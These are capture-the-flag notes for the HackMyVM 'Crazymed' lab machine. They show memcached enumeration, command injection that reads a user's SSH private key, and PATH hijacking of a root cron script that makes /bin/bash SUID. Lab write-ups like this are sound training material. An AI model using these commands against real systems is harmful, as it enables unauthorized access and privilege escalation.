NOTES ABOUT Crazymed
[ 2022-11-06 ] [ HackMyVM / Crazymed ]Status: Rooted
Skills: Port Scanning, OpenSSH, memcached, Command Injection, Path Hijacking
Tools: nmap, nc, ssh, pspy
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.41
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 db:fb:b1:fe:03:9c:17:36:83:ac:6b:c0:52:ad:a0:05 (RSA)
| 256 56:3b:7c:e3:23:4a:25:5a:be:54:d1:2e:9d:44:9a:06 (ECDSA)
|_ 256 81:d4:2e:47:33:34:a9:6f:10:70:c1:90:80:aa:b6:6a (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Crazymed Bootstrap Template - Index
|_http-server-header: Apache/2.4.54 (Debian)
4444/tcp open krb524?
| fingerprint-strings:
| GetRequest:
[...]
| tests are performed on human volunteers for a fee.
| Password:
| [1;31mAccess denied.
[...]
11211/tcp open memcached Memcached 1.6.9 (uptime 86 seconds)
GETTING IN
$ nc 10.0.2.41 11211
version
VERSION 1.6.9
stats cachedump 1 0
ITEM domain [8 b; 0 s]
ITEM server [9 b; 0 s]
ITEM log [18 b; 0 s]
ITEM conf_location [21 b; 0 s]
END
get domain
VALUE domain 0 8
crazymed
END
get server
VALUE server 0 9
127.0.0.1
END
get log
VALUE log 0 18
password: *******
END
get conf_location
VALUE conf_location 0 21
/etc/memecacched.conf
END
^C
$ nc 10.0.2.41 4444
Welcome to the Crazymed medical research laboratory.
All our tests are performed on human volunteers for a fee.
Password: ********
Access granted.
Type "?" for help.
System command: echo `ls -laR ~`
[...]
-rw-r--r-- 1 brad brad 564 Oct 29 11:09 authorized_keys
-rw------- 1 brad brad 2590 Oct 29 11:09 id_rsa
echo `cat /home/brad/.ssh/id_rsa`
----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
[...]
ssh brad@10.0.2.41 -i id_rsa
brad@crazymed:~$ cat user.txt
***********************
ELEVATING PRIVILEGES
brad@crazymed:~$ env
[...]
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
brad@crazymed:~$ ls -la /usr/local/bin
total 8
drwxr-xrwx 2 root root 4096 Oct 31 18:37 . #WRITABLE PATH DIRECTORY
brad@crazymed:~$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
brad@crazymed:~$ chmod +x pspy64
brad@crazymed:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
[...]
2022/11/07 01:35:01 CMD: UID=0 PID=214515 | /bin/bash /opt/check_VM
2022/11/07 01:35:01 CMD: UID=0 PID=214518 | ln -sf /dev/null /root/.bash_history
2022/11/07 01:35:01 CMD: UID=0 PID=214519 |
[...]
^CExiting program... (interrupt)
# PATH HIJACKING
brad@crazymed:~$ cat /opt/check_VM
[...]
chown -R www-data:www-data /var/www/html
[...]
brad@crazymed:~$ echo "chmod u+s /bin/bash" > /usr/local/bin/chown
brad@crazymed:~$ chmod +x /usr/local/bin/chown
brad@crazymed:~$ /bin/bash -p
bash-5.1# id
uid=1000(brad) gid=1000(brad) euid=0(root) groups=1000(brad),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
bash-5.1# cat root.txt
*********************************
bash-5.1# systemctl poweroff
bash-5.1# Connection to 10.0.2.41 closed by remote host.
Connection to 10.0.2.41 closed.